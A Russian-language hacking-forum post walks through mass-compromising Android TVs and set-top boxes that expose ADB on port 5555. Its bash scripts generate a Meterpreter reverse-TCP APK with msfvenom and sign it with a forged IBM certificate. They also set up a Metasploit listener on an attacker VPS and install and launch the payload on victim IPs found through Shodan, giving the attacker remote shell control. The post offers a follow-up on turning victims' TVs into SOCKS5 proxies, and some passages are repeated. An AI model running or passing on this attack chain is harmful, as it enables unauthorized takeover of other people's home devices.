Пожалуйста, обратите внимание, что пользователь заблокирован
Ломать мы будем, как говорится, своими руками. Ну не совсем своими, а с помощью такой полезной штуки, как ADB - Android Debug Bridge. Она висит открытая на 5555 порту практически на всех AndroidTV , различных приставках, очень много устройств так же остаются подвержены этой уязвимости... Попробую объяснить:
На вашей VPS устанавливаем msf и начинаем "слушать":
Генерация полезной нагрузки закончена, переходим к боевым модулям))). Идем на SHODAN.IO , в строке поиска вбиваем Android Debug Bridge. Получаем выборку с открытым :5555 портом. Отлично. На машине с установленным ADB пишем следующий сниппет для удобства заражения.
Теперь все очень просто
выбираем IP из выборки шодана, пишем:
После проделанных нехитрых манипуляций, чекаем VPS, где, в случае успеха (точнее говоря если устройство онлайн) мы получаем андроид-сессию))) Вот и все) удаленное устройство - под Вашим полным контролем. В msf используем команду sessions , далее sessions номер_сесси - и мы внутри))) командой shell мы получаем доступ к консоли устойства, а остальные плюшки смотрим help.
Понравилось - поставь лайк) Я тут первый день. Напиши ниже, хочешь ли ты, чтобы я рассказал тебе как получить SOCKS5 прокси из буржуйского телека с его домашним айпи или это "баян" и "аффтар жжет")) Интересно Ваше мнение. Пишу все собственноручно никакого копи-паст, так что если ошибка - не ругайтесб, все исправим) Всем добра))))
Bash:
#!/bin/bash
[[ -z "$(type keytool)" ]] && apt-get install openjdk-11-jdk # java - понадобится ниже
[[ -z "$(type msfvenom)" ]] && curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall # рекомендую использовать все-таки "ночные" сборки
msfvenom -p android/meterpreter/reverse_tcp lhost="$(curl ifconfig.me)" lport=31337 -o apk.apk # СОЗДАЕМ ПЭЙЛОАД, LHOST берет внешний IP, подразумеваю что вы делаете это на VPS..
alias1=$(echo $(openssl rand -base64 16)) # ГЕНЕРИРУЕМ РАНДОМНОЕ ЗНАЧЕНИЕ, КОТОРОЕ БУДЕМ ИСПОЛЬЗОВАТЬ НИЖУ
# ТУТ НУЖНО ОТМЕТИТЬ, ЧТО СИСТЕМА АНДРОИД ТРЕБУЕТ НАЛИЧИЕ СЕРТИФИКАТА В УСТАНОВЛЕННЫХ ДИСТАНЦИОННО ПРИЛОЖЕНИЯХ. НЕ ВОПРОС - СОЗДАЕМ!
keytool -genkey -noprompt -alias $alias1 -dname "CN=mqttserver.ibm.com, OU=ID, O=IBM, L=Hursley, S=Hants, C=GB" -keyalg RSA -keysize 2048 -validity 10000 -keystore keystore -storepass password -keypass password
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore keystore -storepass password -keypass password apk.apk $alias1
Bash:
#!/bin/bash
cat<<'EOF'>/tmp/listen.rc
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set LPORT 31337
set ExitOnSession false
exploit -j -z
EOF
msfconsole -q -r /tmp/listen.rc
Генерация полезной нагрузки закончена, переходим к боевым модулям))). Идем на SHODAN.IO , в строке поиска вбиваем Android Debug Bridge. Получаем выборку с открытым :5555 портом. Отлично. На машине с установленным ADB пишем следующий сниппет для удобства заражения.
Bash:
#!/bin/bash
cat<<'EOF'>/usr/local/bin/adbinfect
killall -9 adb ; adb connect "$2":5555 ; adb root # убиваем предидущий сервер и запускаем новый. соединяемся с устройством
adb -s "$2":5555 uninstall com.metasploit.stage # удаляем "соседей"
adb -s "$2":5555 install -r -t "$1" # устанавливаем свой софт
adb -s "$2":5555 shell am start -n com.metasploit.stage/com.metasploit.stage.MainActivity #запускаем
EOF
chmod +x /usr/local/bin/adbinfect
Теперь все очень просто
adbinfect apk.apk АЙПИПосле проделанных нехитрых манипуляций, чекаем VPS, где, в случае успеха (точнее говоря если устройство онлайн) мы получаем андроид-сессию))) Вот и все) удаленное устройство - под Вашим полным контролем. В msf используем команду sessions , далее sessions номер_сесси - и мы внутри))) командой shell мы получаем доступ к консоли устойства, а остальные плюшки смотрим help.
Понравилось - поставь лайк) Я тут первый день. Напиши ниже, хочешь ли ты, чтобы я рассказал тебе как получить SOCKS5 прокси из буржуйского телека с его домашним айпи или это "баян" и "аффтар жжет")) Интересно Ваше мнение. Пишу все собственноручно никакого копи-паст, так что если ошибка - не ругайтесб, все исправим) Всем добра))))